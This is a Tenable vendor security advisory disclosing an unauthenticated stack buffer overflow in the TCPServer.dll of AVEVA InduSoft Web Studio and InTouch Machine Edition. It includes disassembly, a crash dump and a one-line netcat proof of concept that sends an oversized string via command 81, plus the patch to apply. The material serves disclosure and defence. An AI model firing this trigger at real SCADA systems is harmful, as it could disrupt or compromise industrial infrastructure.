Tenable Research Advisory: Patches Issued For Critical Vulnerabilities in 2 AVEVA SCADA/OT Apps

Tenable Research

A new critical remote code execution vulnerability in AVEVA’s Indusoft Web Studio and InTouch Machine Edition can be exploited to compromise sensitive operational technology. AVEVA has released a patch and we advise urgent attention and response from affected end users.

Tenable Research discovered a new critical remote code execution (RCE) vulnerability in AVEVA’s Indusoft Web Studio and InTouch Machine Edition. The applications contain a stack buffer overflow that can be exploited to execute arbitrary code on target systems.

These products were previously marketed under the Schneider Electric brand and are now being managed by AVEVA.

What do you need to know? Tenable Research discovered a new critical remote code execution vulnerability in AVEVA’s Indusoft Web Studio and InTouch Machine Edition.

What's the attack vector? The vulnerability can be remotely exploited without authentication to execute arbitrary commands on the target system.

What's the business impact? A malicious threat actor can completely compromise and gain control of the system, and use it as a pivot point to execute lateral transfer.

What's the solution? AVEVA has released InduSoft Web Studio Hotfix 81.1.00.08 and InTouch Machine Edition Hotfix 81.1.00.08 to address this vulnerability. Affected users should urgently apply the patches.

Background

InduSoft Web Studio is a suite of tools providing automation building blocks which are used to develop human-machine interfaces (HMIs), Supervisory Control and Data Acquisition (SCADA) systems and embedded instrumentation solutions.

InTouch Machine Edition is an HMI/SCADA software toolset used to develop applications that connect automation systems and interfaces for web browsers, smartphones and tablets.

Diverse industries -- including agriculture, transportation, energy, nuclear power, manufacturing, entertainment and physical security -- use SCADA in conjunction with operational technology (OT). Because of their critical role in modern infrastructure and the wide range of industries that deploy them, SCADA systems have become a primary security concern and are increasingly being targeted by threat actors.

Analysis

Tenable Research found a new stack overflow vulnerability in TCPServer.dll. The vulnerability is in the code to read a 'string' from the received network data. This vulnerability is similar to the one we disclosed in May 2018, but is triggered through command 81 instead of  command 50.

Here’s a description of two data structures in TCPServer.dll to help you understand the vulnerability.

  • The following object (referred here as 'WSTR') is used to store a wide-character string:
  •  Class WSTR
     {
     vftable;
     unsigned short lbuf[0x40]; // local storage for the string data
     void *pData; // ptr to string data; can point to @lbuf
     int32 DataLen; // length allocated for @pData
     ...
     };
    

     When the string can fit in lbuf, it should be stored there. Otherwise, heap memory is allocated to store the string.

  • Another object heavily used in TCPServer.dll is the 'TcpServerThreadBuffer' (referred to here as CBuf). This object is used to store, process and manipulate network data received from clients.
  • Class CBuf
    {
     vftable;
     int32 AllocSize; // used for allocation, seen: 0x4000
     int32 CurPos; // current position
     int32 BufSize; // allocated size of @pBuffer
     void *pBuffer; // buffer holding network data; can point to @lbuf
     byte lbuf[0x100]; // local storage for network data
     ...
    };
    


    Inside the virtual function table, there are many functions used to read and write various types of command parameters (i.e., byte, boolean, short, int32 and string).

    The vulnerability can be triggered via command 81:

    [...]
    .text:5D43D8B8      xor     eax, eax
    .text:5D43D8BA      mov     [ebp+var_wstr.vftable], offset off_5D4CAD5C
    .text:5D43D8C4      mov     word ptr [ebp+var_wstr.lbuf], ax ; wstr.lbuf[0] = '\0';
    .text:5D43D8CB      mov     [ebp+var_wstr.pData], eax ; wstr.pData = NULL;
    .text:5D43D8D1      mov     [ebp+var_wstr.DataLen], eax ; wstr.DataLen = 0;
    .text:5D43D8D7      lea     ecx, [ebp+var_wstr]; a wstr object on the stack
    .text:5D43D8DD      mov     [ebp+var_4], eax
    .text:5D43D8E0      mov     eax, [edi]
    .text:5D43D8E2      push    ecx
    .text:5D43D8E3      mov     ecx, edi
    .text:5D43D8E5      call    [eax+vftCBuf.Cbuf_ReadString] ; Cbuf_ReadString
    [...]
    


    Here, the code tries to read a 'string' object from the network data into a WSTR object (which is on the stack). This means wstr.lbuf is a buffer on the stack.

    Inside Cbuf_ReadString(), the length of the 'string' object is read, and the function tries to allocate str_len + 1 to store the string:

    [...]
    .text:5D40C05D      call    Cbuf_ReadStringLength ; return  1, 2, or 4 byte(s)
    .text:5D40C062      mov     esi, [ebp+arg_sbuf]
    .text:5D40C065      mov     edi, eax ; attacker specifies length 0xffffffff
    .text:5D40C067      mov     ecx, esi
    .text:5D40C069      lea     edx, [edi+1] ; length wraps to 0 if 0xffffffff
    .text:5D40C06C      push    edx
    .text:5D40C06D      call    wstr_alloc
    [...]
    


    If the attacker specifies 0xFFFFFFFF as the string length, alloc size of 0 is passed to wstr_alloc(), which increments the size by one and checks if the size can fit in the local buffer (wstr.lbuf). Since 1 (0 + 1) is less than 0x40 (countof(wstr.lbuf)), the function returns 1 without allocating heap memory, asssuming wstr.lbuf is big enough to store the string:

    [...]
    .text:5D40BDD4      mov     edx, [ebp+arg_size]
    .text:5D40BDD7      inc     edx ; size++
    .text:5D40BDD8      push    edi
    .text:5D40BDD9      mov     edi, ecx
    .text:5D40BDDB      mov     [ebp+arg_size], edx
    .text:5D40BDDE      cmp     edx, 40h
    .text:5D40BDE1      jge     short loc_5D40BDEF
    .text:5D40BDE3      mov     eax, 1
    [...]
    


    Then Cbuf_ReadString() calls a Cbuf method to read in the string data, telling it the stack buffer has 0xffffffff bytes

    [...]
    .text:5D40C09C      push    edi ; 0xffffffff
    .text:5D40C09D      push    ecx ; stack buf
    .text:5D40C09E      mov     ecx, ebx
    .text:5D40C0A0      call    [eax+vftCBuf.ReadAndConvertToWchars] ; stack overflow!
    [...]
    


    which can cause a stack buffer overflow:

    STATUS_STACK_BUFFER_OVERRUN encountered
    (9e8.b28): Break instruction exception - code 80000003 (first chance)
    eax=00000000 ebx=5d15b708 ecx=766ce4b4 edx=0e76efb9 esi=00000000 edi=00ec2870
    eip=766ce331 esp=0e76f200 ebp=0e76f27c iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
    kernel32!UnhandledExceptionFilter+0x5f:
    766ce331 cc              int     3
    0:020> kb
     # ChildEBP RetAddr  Args to Child              
    00 0e76f27c 694c00f1 5d15b708 0e76f298 5d133403 kernel32!UnhandledExceptionFilter+0x5f
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\InduSoft Web Studio v8.1\Bin\TCPSERVER.DLL - 
    01 0e76f288 5d133403 5d15b708 00000001 0e76f5c8 MSVCR110!__crtUnhandledException+0x14
    WARNING: Stack unwind information not available. Following frames may be wrong.
    02 0e76f298 5d13351a 5d15b708 00000010 00000044 TCPSERVER!_StudioSetLanguage__+0x1653
    03 0e76f5c8 5d0bdbff 049ecae8 049ecb18 049ecb18 TCPSERVER!_StudioSetLanguage__+0x176a
    04 0e76f7ec 00410041 00410041 00410041 00410041 TCPSERVER+0x3dbff
    05 0e76f7f0 00410041 00410041 00410041 00410041 0x410041
    06 0e76f7f4 00410041 00410041 00410041 00410041 0x410041
    07 0e76f7f8 00410041 00410041 00410041 00410041 0x410041
    [...]
    

    Proof of Concept (PoC)

    Below is the PoC to trigger the stack buffer overflow:

    cat < (echo -ne '\x02\x31\x10\x31\x10\x38\x10\x32\x10\x32\x03\x02\x51\xff\xff\xff\xff\xff\xff\xff'`python -c "print 'A'*1000"`'\x03') - | nc <target_host> 1234
    

    Business impact

    These vulnerabilities leave InduSoft Web Studio or InTouch Machine Edition server machines vulnerable to an unauthenticated remote attacker who could leverage them to execute arbitrary code, potentially leading to full system compromise. In turn, these machines could allow an attacker to move laterally within a network. Connected HMI clients and OT devices can also be exposed to attacks.

    AVEVA and Tenable consider this a critical vulnerability requiring urgent attention and response from affected end users.

    Solution

    AVEVA has released updates InduSoft Web Studio Hotfix 81.1.00.08 and InTouch Machine Edition Hotfix 81.1.00.08 to remediate this vulnerability. Update the application by applying the appropriate patches:

    Additional information

    Read more >

    Published on Jul 18, 2018

    People also viewed

    Customer Success Manager - ANZ

    North Sydney Australia Pacific Highway, North Sydney, Australia, NSW 2060 Customer Success Sales
    Your Role:Tenable has an immediate need for a Customer Success Manager who will be responsible for establishing and driving sales activities for our software products within a designated geography.Companies today are grappling with an ever expandi...

    Field and Channel Marketing Manager, Nordics and Benelux

    Uxbridge United Kingdom Furzeground Way , Stockley Park, Uxbridge, United Kingdom, UB11 1EZ Field & Channel Marketing Marketing
    Your Role:Tenable seeks an experienced field and channel marketing manager to generate demand for Tenable products and solutions across our Scandinavia and Benelux territories.  The successful candidate will have demonstrated experience creating, ...

    Finance & Investor Relations Intern

    Columbia Maryland United States Columbia Gateway Drive, Columbia, Maryland, United States, 21046 Finance Internships
    Your Role:Tenable has a Finance and Investor Relations Intern opportunity for college students entering their senior year or actively enrolled in an MBA program. If you're looking for a chance to apply what you're learning in your degree program, ...

    Senior Data Engineer

    Dublin Ireland Campshires, Sir John Rogerson's Quay, Dublin, Ireland Research Engineering
    Your Role:Data Engineers here are involved in designing, developing and maintaining systems for data analysis, transformation, modelling and visualisation. We work directly with the data scientists to develop cutting edge uses of the data we colle...

    Technical Support Manager

    Columbia Maryland United States Columbia Gateway Drive, Columbia, Maryland, United States, 21046 Technical Support Technical Support
    Your Role:Tenable is seeking a high energy, results oriented customer advocate capable of motivating an already exceptional support team to even higher levels of customer satisfaction. Our current global rating is over 93% satisfaction and we expe...

    Cloud Security Intern

    Columbia Maryland United States Columbia Gateway Drive, Columbia, Maryland, United States, 21046 Information Security Internships
    Your Role: The Cloud Security Intern will help the Tenable secure their use of cloud systems across the company.  The intern will develop, implement and monitor security solutions for cloud that assess risk, keep Tenable data safe and bake in secu...

    We have big plans for continued global growth, and we’re looking for people who are creative, flexible and dedicated to helping us build something great – something that matters.